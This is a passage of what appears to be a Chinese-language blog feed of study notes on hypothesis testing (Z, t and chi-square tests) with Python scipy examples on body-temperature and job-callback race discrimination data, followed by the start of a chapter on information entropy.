    n = len(df['Temperature'])

    # Sample mean 样本均值
    mu = np.mean(df['Temperature'])

    # Sample standard deviation 样本方差
    std = np.std(df['Temperature'])

    print('Mean temperature: ', mu, 'with standard deviation of +/-', std)

    # Random sampling of the data based off of the mean of the data.
    # 根据数据的平均值对数据进行随机抽样。
    normalized_sample = np.random.normal(mu, std, size=10000)
    x_temperature, y_temperature = ecdf(df['Temperature'])
    normalized_x, normalized_y = ecdf(normalized_sample)

    # Plot the ECDFs
    fig = plt.figure(figsize=(8, 5))
    plt.plot(normalized_x, normalized_y)
    plt.plot(x_temperature, y_temperature, marker='.', linestyle='none')
    plt.ylabel('ECDF')
    plt.xlabel('Temperature')
    plt.legend(('Normal Distribution', 'Sample data'))
    Mean temperature:  98.24923076923076 with standard deviation of +/- 0.730357778905038<matplotlib.legend.Legend at 0x1bc43440b20>

    png

    3 有学者提出 98.6°F(37°C)是人类的平均气温, 我们是否接受该观点?

    from scipy import stats

    CW_mu = 98.6
    # 计算单独样本 t 检验
    stats.ttest_1samp(df['Temperature'], CW_mu, axis=0)
    Ttest_1sampResult(statistic=-5.454823292364077, pvalue=2.410632041561008e-07)

    $pvalue\approx0$, 拒绝原假设

    4 男性和女性的体温有明显的差异吗?

    female_temp = df.Temperature[df.Gender == 2]
    male_temp = df.Temperature[df.Gender == 1]

    # 当不确定两总体方差是否相等时, 应先利用 levene 检验, 检验两总体是否具有方差齐性
    rvs1 = stats.norm.rvs(female_temp)
    rvs2 = stats.norm.rvs(male_temp)
    print(stats.levene(rvs1, rvs2))

    mean_female_temp = np.mean(female_temp)
    mean_male_temp = np.mean(male_temp)
    print('Average female body temperature = ' + str(mean_female_temp))
    print('Average male body temperature = ' + str(mean_male_temp))

    # Compute independent t-test
    """
    计算两个独立分数样本的平均值的 T-test。
    这是对 2 个独立样本具有相同平均(预期)值的零假设的检验。此测试假定默认情况下总体具有相同的方差。
    """
    print(stats.ttest_ind(female_temp, male_temp, axis=0))
    LeveneResult(statistic=2.1897731829800553, pvalue=0.14138681028945846)Average female body temperature = 98.39384615384616Average male body temperature = 98.1046153846154Ttest_indResult(statistic=2.2854345381654984, pvalue=0.02393188312240236)

    LeveneResult 每次都不尽相同, 但是$pvalue$的值都远大于 0.05, 认为两总体具有方差齐性

    Ttest_indResult 的$pvalue$小于显著性水平 0.05, 有超过 95%的把握认为两者是有差异的

    12.7 综合实例 2——种族对求职是否有影响

    import pandas as pd
    import numpy as np
    from scipy import stats

    data = pd.io.stata.read_stata('us_job_market_discrimination.dta')
    data.head()
    id ad education ofjobs yearsexp honors volunteer military empholes occupspecific ... compreq orgreq manuf transcom bankreal trade busservice othservice missind ownership
    0 b 1 4 2 6 0 0 0 1 17 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 b 1 3 3 6 0 1 1 0 316 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 b 1 4 1 6 0 0 0 0 19 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 b 1 3 4 6 0 1 0 1 313 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 b 1 3 3 22 0 0 0 0 313 ... 1.0 1.0 0.0 0.0 0.0 0.0 0.0 1.0 0.0 Nonprofit

    5 rows × 65 columns

    blacks = data[data.race == 'b']
    whites = data[data.race == 'w']
    blacks.call.describe()
    count    2435.000000mean        0.064476std         0.245649min         0.00000025%         0.00000050%         0.00000075%         0.000000max         1.000000Name: call, dtype: float64
    whites.call.describe()
    count    2435.000000mean        0.096509std         0.295346min         0.00000025%         0.00000050%         0.00000075%         0.000000max         1.000000Name: call, dtype: float64

    黑人录取率 6.4%, 白人录取率 9.7%

    blacks_called = len(blacks[blacks['call'] == True])
    blacks_not_called = len(blacks[blacks['call'] == False])
    whites_called = len(whites[whites['call'] == True])
    whites_not_called = len(whites[whites['call'] == False])
    observed = pd.DataFrame({'blacks': {'called': blacks_called, 'not_called': blacks_not_called},
    'whites': {'called' : whites_called, 'not_called' : whites_not_called}})
    observed
    blacks whites
    called 157 235
    not_called 2278 2200
    # 统计获得职位和未获得职位的人数
    num_called_back = blacks_called + whites_called
    num_not_called = blacks_not_called + whites_not_called
    # 得到获得职位的理论比率
    rate_of_callbacks = num_called_back / (num_not_called + num_called_back)
    # 获得职位和未获得职位的理论值
    expected_called = len(data) * rate_of_callbacks
    expected_not_called = len(data) * (1 - rate_of_callbacks)
    # 理论值四格表(黑人和白人的录取率相等)
    expected = pd.DataFrame({'blacks':{'called': expected_called / 2, 'not_called': expected_not_called / 2},
    'whites': {'called': expected_called / 2, 'not_called': expected_not_called / 2}})
    expected
    blacks whites
    called 196.0 196.0
    not_called 2239.0 2239.0
    import scipy.stats as stats

    observed_frequencies = [blacks_not_called, whites_not_called, whites_called, blacks_called]
    expected_frequencies = [expected_not_called / 2, expected_not_called / 2, expected_called / 2, expected_called / 2]
    # 卡方检验
    stats.chisquare(f_obs=observed_frequencies, f_exp=expected_frequencies)
    Power_divergenceResult(statistic=16.87905041427022, pvalue=0.0007483959441097264)

    $pvalue\le \chi^2_{0.05}(1)$, 认为求职路上种族歧视是存在的

    12.9 习题

    1 t 检验

    在 10 块土地上同时种植甲, 乙两种作物, 其产量服从正态分布, 并且方差相同.

    计算结果得$\bar X=30.97, \bar Y=21.79, S_x=26.7, S_y=12.1$, 试问这两种作物的产量有无明显差异?

    import numpy as np
    from scipy import stats

    mean1 = 30.97
    mean2 = 21.79

    std1 = 26.7
    std2 = 12.1

    nobs1 = 10
    nobs2 = 10

    modified_std1 = np.sqrt(np.float32(nobs1) / np.float32(nobs1-1)) * std1
    modified_std2 = np.sqrt(np.float32(nobs2) / np.float32(nobs2-1)) * std2

    (statistic, pvalue) = stats.ttest_ind_from_stats(mean1=mean1, std1=modified_std1, nobs1=10, mean2=mean2, std2=modified_std2, nobs2=10)

    print("t statistic is: ", statistic)
    print("pvalue is: ", pvalue)
    t statistic is:  0.9394886573346275pvalue is:  0.35991721678518696

    $pvalue\ge 0.05$, 没有显著差异

    2 卡方检验

    从某中学随机抽取两个班, 判断这两个班对待文理分科的态度是否有显著差异($\alpha=0.05$)?

    卡方检验(两个类别变量是否独立)以及 chi2_contingency

    赞成反对
    甲班372764
    乙班392160
    7648124

    自由度=(行数-1)(列数-1)=1

    $\chi2=\frac{(AD-BC)2}{(A+B)(C+D)}=19.8375>\chi^2_{0.05}(1)=3.843$(不知道这么算对不对…)

    所以没有显著差异

    from  scipy.stats import chi2_contingency
    import numpy as np

    kf_data = np.array([[37,27], [39,21]])
    kf = chi2_contingency(kf_data)
    print('chisq-statistic=%.4f, p-value=%.4f, df=%i expected_frep=%s' % kf)
    chisq-statistic=0.4054, p-value=0.5243, df=1 expected_frep=[[39.22580645 24.77419355] [36.77419355 23.22580645]]

    $p-value>0.05$, 所以没有显著差异

    ]]>
    + 正文:4 应用篇

    12 假设检验

    12.1 假设检验的基本概念

    12.1.1 假设检验的基本思想

    根据实际情况的要求对检验对象提出一个假设$H_0$(称为原假设), 同时提出一个与原假设对立的备设假设$H_1$

    $P\{\color{Red}Z\in \color{Blue}W|H_0$为真$\}\le \color{Green}\alpha (\alpha$很小$)$

    $\color{Red}Z$: 检验统计量

    $\color{Blue}W$: 区域

    $\color{Green}\alpha$: 显著性水平

    例 12.1

    已知某炼铁厂的铁水含碳量$X\sim N(4.55, 0.06)$, 现改变了工艺条件, 又测得 10 种贴水的平均含碳量$\bar X = 4.57$, 假设方差无变化, 问总体均值$\mu$是否有明显改变?

    设$H_0:\mu=4.55,H_1:\mu\ne4.55$

    令事件$A:|\bar X-4.55|\ge d,d>0, \alpha=0.05$得到不等式:

    $P($当$H_0$为真, 拒绝$H_0)=P(|\bar X -4.55|\ge d)\le \alpha$

    $P($当$H_0$为真, 拒绝$H_0)=P(|\frac{\bar X -4.55}{\sigma/\sqrt n}|\ge \frac{d}{\sigma/\sqrt n})\le \alpha$

    若 X 的样本观察值满足:

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| < k\Rightarrow $接受$H_0$

    $|Z|=|\frac{\bar X -4.55}{\sigma/\sqrt n}| \ge k\Rightarrow $拒绝$H_0$($H_0$的拒绝域)

    $k = Z_{\alpha/2}$

    由$\alpha=0.05$得$Z_{\alpha/2}=1.96$

    $Z=\frac{4.57-4.55}{0.66/\sqrt{10}}, |Z|<Z_{\alpha/2}$, 认为接受原假设$H_0$, 认为工艺是正常的

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import numpy as np
    from scipy.stats import norm

    mu = 4.55
    sigma = 0.06
    X_bar = 4.57
    n = 10
    alpha = 0.05
    Z_alpha_div_2 = norm.ppf(1 - alpha / 2)
    Z = (X_bar - mu) / (sigma / np.sqrt(n))
    Z, Z_alpha_div_2
    (1.054092553389484, 1.959963984540054)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import matplotlib.pyplot as plt
    from scipy.stats import norm
    import numpy as np

    alpha = 0.05
    plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100))) # 绘制曲线
    plt.fill_between(np.linspace(-3, norm.ppf(alpha / 2), 50),
    norm.pdf(np.linspace(-3, norm.ppf(alpha / 2), 50)),
    alpha=.15, color="red", label="Rejection region |Z|>k")
    plt.fill_between(np.linspace(norm.ppf(1 - alpha / 2), 3, 50),
    norm.pdf(np.linspace(norm.ppf(1 - alpha / 2), 3, 50)),
    alpha=.15, color="red")
    plt.fill_between(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50),
    norm.pdf(np.linspace(norm.ppf(alpha / 2), norm.ppf(1 - alpha / 2), 50)),
    alpha=.15, color="blue", label="Acceptance region |Z|<= k")
    plt.legend()
    plt.show() # 显示图片

    png

    12.1.2 左右侧检验与双侧检验

    • 左侧检验: $H_0:\mu\ge\mu_0($或$\mu=\mu_0),H_1:\mu<\mu_0$, 拒绝域: $Z\le-Z_\alpha$

    • 右侧检验: $H_0:\mu\le\mu_0($或$\mu=\mu_0),H_1:\mu>\mu_0$, 拒绝域: $Z\ge Z_\alpha$

    • 双侧检验: $H_0:\mu=\mu_0,H_1:\mu\ne\mu_0$, 拒绝域: $|Z|\ge Z_\alpha$

    12.1.3 P 值检验法

    以上为临界值检验法,下面介绍 P 值检验法,所谓 P 值检验法就是由检验统计量的样本观察值得出的原假设可被拒绝的最小显著性水水平。

    数学基础-概率论 05(统计推断-分布拟合检验)

    png

    例 12.3

    某食品厂用自动装罐机装罐头食品, 每罐的标准重量$\mu_0=500g$

    设罐重是服从正态分布的随机变量, 标准差$\sigma=10$

    从中抽取$n_1 =10$罐, 测得平均重量为$\bar X_1=506g$

    隔一段时间后又抽$n_1=10$罐, 测的平均重量为$\bar X_2=505g$

    问这时机器工作是否正常?

    提出假设$H_0:\mu=\mu_0=500,H_1:\mu\ne\mu_0$

    取$\alpha=0.05$

    $Z_1=\frac{506-500}{10/\sqrt{10}}=1.897, Z_2=\frac{505-500}{10/\sqrt{10}}=1.581$

    $P{Z\ge Z_1}=P{Z\ge 1.897}=1-\Phi(1.897)=0.029>\frac{\alpha}{2}=0.025$

    $P{Z\ge Z_2}=P{Z\ge 1.581}=1-\Phi(1.581)=0.057>\frac{\alpha}{2}=0.025$

    接受原假设$H_0$, 第二次抽样支持原假设的强度更大

    12.2 Z 检验(正态总体均值的假设检验, 方差已知时)

    $\bar X\sim N(\mu_0, \frac{\sigma^2}{n})$当$H_0$真实时$Z=\frac{\bar X -\mu}{\sigma/\sqrt n}\sim N(0,1)$

    若两组样本方差$\sigma2_1$和$\sigma2_2$已知, 统计量$Z$的计算公式:

    $$Z=\frac{\bar X_1 - \bar X_2}{\sqrt{\frac{\sigma2_1}{n_1}+\frac{\sigma2_2}{n_2}}}\sim N(0,1)$$

    12.3 t 检验(正态总体均值的假设检验, 方差未知时)

    由于总体方差未知, 用样本标准差$S$代替$Z$检验法中的总体标准差$\sigma$

    $$T=\frac{\bar X - \mu_0}{S/\sqrt n}\sim t(n-1)$$

    若有两种独立样本, 选取统计量

    $$T=\frac{(\bar X - \bar Y)-(\mu_1-\mu_2)}{S_w\sqrt{\frac{1}{n_1}+\frac{1}{n_2}}}$$

    其中

    $$S_w=\sqrt{\frac{(n_1-1)S2_1+(n_2-1)S2_2}{n_1+n_2-2}}$$

    12.4 卡方检验

    未知总体的分布的假设检验(非参数检验)$\chi^2$拟合检验法

    其基本思想是用得到的样本观察值来与假设的总体的分布函数(或分布律)来进行某种拟合, 再根据拟合的程度确定是否接受原假设, 从而推断总体是否服从假设的分布.

    设总体$X$的分布函数$F(x)$未知, $X_1,X_2,…,X_n$是来自总体$X$的一个样本, 建立假设检验

    $H_0:F(x)=F_0(x), H_1:F(x)\ne F_0(x)$, 其中$F_0(x)$是已知的分布函数

    皮尔逊定理

    若$n$充分大(一般$n\ge 50$), 则当$H_0$为真时, 无论总体 X 服从何种分布

    统计量$\chi2=\Sigmak_{i=1}\frac{(n_i-np_i)2}{np_i}$都近似服从$\chi2(k-r-1)$,$r$是分布中未知参数的个数

    例 12.12

    某市自开办有奖储蓄以来, 13 期兑奖中各数码的频数汇总如下表所示

    数码$i$0 1 2 3 4 5 6 7 8 9总数
    频数$f_i$21 28 37 36 31 45 30 37 33 52350

    如果检验器械或操作方法没有问题, 则各数码服从均匀分布, 提出检验假设$H_0:p_i=\frac{1}{10},i=0,1,2,…,9$理论频数$np_i=35$,

    统计量$\chi2=\Sigma{10}_{i=1}\frac{(n_i-np_i)^2}{np_i}=\frac{688}{35}=19.657$

    而$\chi^2_\alpha(k-1)=16.9,19.657>16.9$拒绝$H_0$, 认为器械操作方法有问题

    12.5 假设检验中的两类错误

    决策结果\实际情况$H_0$为真$H_0$为假
    拒绝$H_0$弃真(第一类错误)取伪(无错)
    接受$H_0$存真(无错)取伪(第二类错误)

    $P{Z\in W|H_0 is true}\le \alpha$

    $P{Z\notin W|H_0 is not true}=\beta$

    在假设检验中, 通常是要求犯第一类错误的概率不超过预定的数$\alpha$(如 0.05, 0.01 等), 同时希望犯第二类错误的概率尽可能小

    12.6 综合实例 1——体检数据中的假设检验问题

    变量名描述
    Temperature体温(华氏温度)
    Gender性别(1 为男, 2 为女)
    Heart Rate心率(每分钟心跳次数)

    (1)显示数据集及相关统计描述信息(均值, 标准差等)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import pandas as pd
    import pylab
    import math
    import numpy as np
    import matplotlib.pyplot as plt
    import numpy as np
    from scipy.stats import norm
    import scipy.stats
    import warnings
    warnings.filterwarnings('ignore')

    df = pd.read_csv('normtemp.txt', sep=' ', names=['Temperature', 'Gender', 'Heart Rate'])
    df.describe()
    Temperature Gender Heart Rate
    count 130.000000 130.000000 130.000000
    mean 98.249231 1.500000 73.761538
    std 0.733183 0.501934 7.062077
    min 96.300000 1.000000 57.000000
    25% 97.800000 1.000000 69.000000
    50% 98.300000 1.500000 74.000000
    75% 98.700000 2.000000 79.000000
    max 100.800000 2.000000 89.000000

    分别显示了各属性的总数, 均值, 标准差, 最大值和最小值, 以及各种分位点值

    1
    df.head()
    Temperature Gender Heart Rate
    0 96.3 1 70
    1 96.7 1 71
    2 96.9 1 74
    3 97.0 1 80
    4 97.1 1 73

    (2) 试检验体温的分布是否服从正态分布

    这里用的跟之前书上讲的根本就不是一个方法…

    正态检验 (Normality Test)——常见方法汇总与简述

    png

    有多种手段评估数据是否正态分布。分两大类:图形和统计量。图形手段包括 q-q plot 和 p-p plot,统计量手段包括 Kolmogorov-Smirnov 检验 and Shapiro-Wilks 检验。

    Samuel Shapiro 和 MartinWilk 于 1965 年提出了 Shapiro–Wilk 检验。他们观察到 Normal probability plot 与线性回归很类似。Normalprobability plot 是 q-q plot 的特例,检查样本数据集是否匹配某正态分布,比如标准正态分布 N(0,1)。

    1.直方图初判
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    observed_temperatures = df['Temperature'].sort_values()
    bin_val = np.arange(start= observed_temperatures.min(), stop= observed_temperatures.max(), step = .05)
    mu, std = np.mean(observed_temperatures), np.std(observed_temperatures)
    p = norm.pdf(observed_temperatures, mu, std)
    plt.hist(observed_temperatures,bins = bin_val, density=True, stacked=True)
    plt.plot(observed_temperatures, p, color = 'red')
    plt.xticks(np.arange(95.75,101.25,0.25),rotation=90)
    plt.xlabel('Human Body Temperature Distributions')
    plt.xlabel('human body temperature')
    plt.show()
    print('Average (Mu): '+ str(mu) + ' / ' 'Standard Deviation: '+str(std))

    png

    Average (Mu): 98.24923076923076 / Standard Deviation: 0.7303577789050376
    2.利用 Scipy 工具检验正态性
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    # Shapiro-Wilk Test: https://en.wikipedia.org/wiki/Shapiro%E2%80%93Wilk_test
    """
    语法:scipy.stats.shapiro(x, a=None, reta=False)
    x 为待检验的数据
    返回(统计数, P 值)
    """
    shapiro_test, shapiro_p = scipy.stats.shapiro(observed_temperatures)
    print("Shapiro-Wilk Stat:",shapiro_test, "\nShapiro-Wilk p-Value:", shapiro_p)
    """
    语法 scipy.stats.normaltest(a, axis=0, nan_policy='propagate')
    a 是待检验数据
    axis 正态分布测试将沿其计算的轴
    返回:(对数据集进行假设检验的 k2 值, P 值)
    """
    k2, p = scipy.stats.normaltest(observed_temperatures)
    print('p:',p)
    Shapiro-Wilk Stat: 0.9865769743919373 Shapiro-Wilk p-Value: 0.2331680953502655p: 0.2587479863488212
    3.通过分位数-分位数(Q-Q)图检查正态分布
    1
    2
    3
    # stats.probplot(QQ 图)
    scipy.stats.probplot(observed_temperatures, dist="norm", plot=pylab)
    pylab.show()

    png

    4.基于 ECDF(经验累积分布函数)正态检验

    根据当前样本的均值和标准差随机生成一个新的正态分布, 然后将它的累积分布函数和样本数据的累积分布函数比较, 如果实测差异足够大, 该检验将拒绝总体呈正态分布的原假设

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    def ecdf(data):
    """Compute ECDF"""
    n = len(data)
    x = np.sort(data)
    y = np.arange(1, n+1) / n
    return x, y

    # Compute empirical mean and standard deviation 计算经验平均值和标准差

    # Number of samples
    n = len(df['Temperature'])

    # Sample mean 样本均值
    mu = np.mean(df['Temperature'])

    # Sample standard deviation 样本方差
    std = np.std(df['Temperature'])

    print('Mean temperature: ', mu, 'with standard deviation of +/-', std)

    # Random sampling of the data based off of the mean of the data.
    # 根据数据的平均值对数据进行随机抽样。
    normalized_sample = np.random.normal(mu, std, size=10000)
    x_temperature, y_temperature = ecdf(df['Temperature'])
    normalized_x, normalized_y = ecdf(normalized_sample)

    # Plot the ECDFs
    fig = plt.figure(figsize=(8, 5))
    plt.plot(normalized_x, normalized_y)
    plt.plot(x_temperature, y_temperature, marker='.', linestyle='none')
    plt.ylabel('ECDF')
    plt.xlabel('Temperature')
    plt.legend(('Normal Distribution', 'Sample data'))
    Mean temperature:  98.24923076923076 with standard deviation of +/- 0.730357778905038<matplotlib.legend.Legend at 0x1bc43440b20>

    png

    3 有学者提出 98.6°F(37°C)是人类的平均气温, 我们是否接受该观点?

    1
    2
    3
    4
    5
    from scipy import stats

    CW_mu = 98.6
    # 计算单独样本 t 检验
    stats.ttest_1samp(df['Temperature'], CW_mu, axis=0)
    Ttest_1sampResult(statistic=-5.454823292364077, pvalue=2.410632041561008e-07)

    $pvalue\approx0$, 拒绝原假设

    4 男性和女性的体温有明显的差异吗?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    female_temp = df.Temperature[df.Gender == 2]
    male_temp = df.Temperature[df.Gender == 1]

    # 当不确定两总体方差是否相等时, 应先利用 levene 检验, 检验两总体是否具有方差齐性
    rvs1 = stats.norm.rvs(female_temp)
    rvs2 = stats.norm.rvs(male_temp)
    print(stats.levene(rvs1, rvs2))

    mean_female_temp = np.mean(female_temp)
    mean_male_temp = np.mean(male_temp)
    print('Average female body temperature = ' + str(mean_female_temp))
    print('Average male body temperature = ' + str(mean_male_temp))

    # Compute independent t-test
    """
    计算两个独立分数样本的平均值的 T-test。
    这是对 2 个独立样本具有相同平均(预期)值的零假设的检验。此测试假定默认情况下总体具有相同的方差。
    """
    print(stats.ttest_ind(female_temp, male_temp, axis=0))
    LeveneResult(statistic=2.1897731829800553, pvalue=0.14138681028945846)Average female body temperature = 98.39384615384616Average male body temperature = 98.1046153846154Ttest_indResult(statistic=2.2854345381654984, pvalue=0.02393188312240236)

    LeveneResult 每次都不尽相同, 但是$pvalue$的值都远大于 0.05, 认为两总体具有方差齐性

    Ttest_indResult 的$pvalue$小于显著性水平 0.05, 有超过 95%的把握认为两者是有差异的

    12.7 综合实例 2——种族对求职是否有影响

    1
    2
    3
    4
    5
    6
    import pandas as pd
    import numpy as np
    from scipy import stats

    data = pd.io.stata.read_stata('us_job_market_discrimination.dta')
    data.head()
    id ad education ofjobs yearsexp honors volunteer military empholes occupspecific ... compreq orgreq manuf transcom bankreal trade busservice othservice missind ownership
    0 b 1 4 2 6 0 0 0 1 17 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    1 b 1 3 3 6 0 1 1 0 316 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    2 b 1 4 1 6 0 0 0 0 19 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    3 b 1 3 4 6 0 1 0 1 313 ... 1.0 0.0 1.0 0.0 0.0 0.0 0.0 0.0 0.0
    4 b 1 3 3 22 0 0 0 0 313 ... 1.0 1.0 0.0 0.0 0.0 0.0 0.0 1.0 0.0 Nonprofit

    5 rows × 65 columns

    1
    2
    3
    blacks = data[data.race == 'b']
    whites = data[data.race == 'w']
    blacks.call.describe()
    count    2435.000000mean        0.064476std         0.245649min         0.00000025%         0.00000050%         0.00000075%         0.000000max         1.000000Name: call, dtype: float64
    1
    whites.call.describe()
    count    2435.000000mean        0.096509std         0.295346min         0.00000025%         0.00000050%         0.00000075%         0.000000max         1.000000Name: call, dtype: float64

    黑人录取率 6.4%, 白人录取率 9.7%

    1
    2
    3
    4
    5
    6
    7
    blacks_called = len(blacks[blacks['call'] == True])
    blacks_not_called = len(blacks[blacks['call'] == False])
    whites_called = len(whites[whites['call'] == True])
    whites_not_called = len(whites[whites['call'] == False])
    observed = pd.DataFrame({'blacks': {'called': blacks_called, 'not_called': blacks_not_called},
    'whites': {'called' : whites_called, 'not_called' : whites_not_called}})
    observed
    blacks whites
    called 157 235
    not_called 2278 2200
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # 统计获得职位和未获得职位的人数
    num_called_back = blacks_called + whites_called
    num_not_called = blacks_not_called + whites_not_called
    # 得到获得职位的理论比率
    rate_of_callbacks = num_called_back / (num_not_called + num_called_back)
    # 获得职位和未获得职位的理论值
    expected_called = len(data) * rate_of_callbacks
    expected_not_called = len(data) * (1 - rate_of_callbacks)
    # 理论值四格表(黑人和白人的录取率相等)
    expected = pd.DataFrame({'blacks':{'called': expected_called / 2, 'not_called': expected_not_called / 2},
    'whites': {'called': expected_called / 2, 'not_called': expected_not_called / 2}})
    expected
    blacks whites
    called 196.0 196.0
    not_called 2239.0 2239.0
    1
    2
    3
    4
    5
    6
    import scipy.stats as stats

    observed_frequencies = [blacks_not_called, whites_not_called, whites_called, blacks_called]
    expected_frequencies = [expected_not_called / 2, expected_not_called / 2, expected_called / 2, expected_called / 2]
    # 卡方检验
    stats.chisquare(f_obs=observed_frequencies, f_exp=expected_frequencies)
    Power_divergenceResult(statistic=16.87905041427022, pvalue=0.0007483959441097264)

    $pvalue\le \chi^2_{0.05}(1)$, 认为求职路上种族歧视是存在的

    12.9 习题

    1 t 检验

    在 10 块土地上同时种植甲, 乙两种作物, 其产量服从正态分布, 并且方差相同.

    计算结果得$\bar X=30.97, \bar Y=21.79, S_x=26.7, S_y=12.1$, 试问这两种作物的产量有无明显差异?

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    import numpy as np
    from scipy import stats

    mean1 = 30.97
    mean2 = 21.79

    std1 = 26.7
    std2 = 12.1

    nobs1 = 10
    nobs2 = 10

    modified_std1 = np.sqrt(np.float32(nobs1) / np.float32(nobs1-1)) * std1
    modified_std2 = np.sqrt(np.float32(nobs2) / np.float32(nobs2-1)) * std2

    (statistic, pvalue) = stats.ttest_ind_from_stats(mean1=mean1, std1=modified_std1, nobs1=10, mean2=mean2, std2=modified_std2, nobs2=10)

    print("t statistic is: ", statistic)
    print("pvalue is: ", pvalue)
    t statistic is:  0.9394886573346275pvalue is:  0.35991721678518696

    $pvalue\ge 0.05$, 没有显著差异

    2 卡方检验

    从某中学随机抽取两个班, 判断这两个班对待文理分科的态度是否有显著差异($\alpha=0.05$)?

    卡方检验(两个类别变量是否独立)以及 chi2_contingency

    赞成反对
    甲班372764
    乙班392160
    7648124

    自由度=(行数-1)(列数-1)=1

    $\chi2=\frac{(AD-BC)2}{(A+B)(C+D)}=19.8375>\chi^2_{0.05}(1)=3.843$(不知道这么算对不对…)

    所以没有显著差异

    1
    2
    3
    4
    5
    6
    from  scipy.stats import chi2_contingency
    import numpy as np

    kf_data = np.array([[37,27], [39,21]])
    kf = chi2_contingency(kf_data)
    print('chisq-statistic=%.4f, p-value=%.4f, df=%i expected_frep=%s' % kf)
    chisq-statistic=0.4054, p-value=0.5243, df=1 expected_frep=[[39.22580645 24.77419355] [36.77419355 23.22580645]]

    $p-value>0.05$, 所以没有显著差异

    ]]>
    @@ -10050,7 +10050,7 @@ /posts/Python-%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%8011/ - 正文

    11 熵与激活函数

    11.1 熵和信息熵

    11.1 熵的概念

    【毕导】你会点进这个视频,并一脸懵逼地出去,而这一切已被物理规律注定了

    简单认识熵,一看就会的那种

    11.2 信息熵的概念

    如何理解信息熵

    科学证明中文就是最最最高级的!【硬核科普】信息熵是什么

    中文是最有效率的语言吗?-- 信息熵简谈

    如果 对一条信息越难预测$\to$信息量就越高$\to$信息熵就越高

    $\color{Purple}{H(P _ 1, P _ 2,…, P _ n)} = - \lambda\color{Green}{\Sigma^n _ {i=1}}\color{Blue}{P _ i} \color{Red}{\log(P _ i)}$

    信息熵等于对单个符号对应的信息量(不确定性), 乘以它出现的概率, 再求和(单个符号不确定性的平均值)

    11.1.3 应用 Python 函数库计算信息熵

    (1) 均匀分布事件的不确定性计算和信息熵计算
    import numpy as np
    import matplotlib.pyplot as plt

    plt.figure(figsize=(8, 5), dpi=80)
    ax = plt.subplot(111)
    ax.spines['right'].set_color('none') # 隐藏右边的边框
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))
    ax.yaxis.set_ticks([1, 2, 3, 4, 5, 6])

    # 定义均匀分布 U[0, 1]
    X = np.linspace(0, 1, 101, endpoint=True)
    X = X[1:100]
    print(X)

    # 计算不确定性
    Y = -1 * X * np.log2(X)
    print("概率值为{}时信息熵分量(单个符号的不确定性)达到最大值{}".format(X[np.argmax(Y)], np.max(Y)))

    plt.plot(X, Y, color="green", linewidth=2, label="p * log2(p)")
    plt.scatter(X[np.argmax(Y)], np.max(Y), color="black")
    plt.text(X[np.argmax(Y)], np.max(Y) + 0.2, "({}, {})".format(X[np.argmax(Y)], np.round(np.max(Y), 2)))

    # 计算信息熵
    Y = -1 * np.log2(X)
    plt.plot(X, Y, color="red", linestyle="dashed", label="log2(p)")

    plt.scatter(0.5, 1, color="black")
    plt.text(0.5, 1.2, "(0.5, 1.0)")

    plt.legend() # 显示图例标注
    plt.show()
    [0.01 0.02 0.03 0.04 0.05 0.06 0.07 0.08 0.09 0.1  0.11 0.12 0.13 0.14 0.15 0.16 0.17 0.18 0.19 0.2  0.21 0.22 0.23 0.24 0.25 0.26 0.27 0.28 0.29 0.3  0.31 0.32 0.33 0.34 0.35 0.36 0.37 0.38 0.39 0.4  0.41 0.42 0.43 0.44 0.45 0.46 0.47 0.48 0.49 0.5  0.51 0.52 0.53 0.54 0.55 0.56 0.57 0.58 0.59 0.6  0.61 0.62 0.63 0.64 0.65 0.66 0.67 0.68 0.69 0.7 0.71 0.72 0.73 0.74 0.75 0.76 0.77 0.78 0.79 0.8  0.81 0.82 0.83 0.84 0.85 0.86 0.87 0.88 0.89 0.9  0.91 0.92 0.93 0.94 0.95 0.96 0.97 0.98 0.99]概率值为 0.37 时信息熵分量(单个符号的不确定性)达到最大值 0.5307290449339367

    png

    $f(x)=xlog2(x)$

    $f’(x)=\frac{lnx+1}{ln2}$

    $f’(x)=0\to x=\frac{1}{e}\approx 0.37$

    • (选择到某一个事件的)概率不断增加时, 事情的状态越来越确定, 不确定性越来越小, (单个符号不确定性的平均值)信息熵也越来越小

    • 对于两个状态的均匀分布(两种状态对应的概率都为 0.5, 如抛硬币), 信息熵为 1

    • 当概率变为 1 时, 事情已经完全确定, 结果不会有任何变化, 此时信息熵变为 0

    • 熵可以应用到分类任务中, 熵值越低分类效果越好

    • 熵可以衡量两个指标对结果的影响大小, 熵值越小的指标对结果的影响更大

    (2) 均匀分布的信息熵和非均匀分布的信息熵

    对同一个随机事件, 均匀分布时的信息熵是最大的

    import numpy as np

    # create some probilities with the sum = 1
    np.random.seed(42)
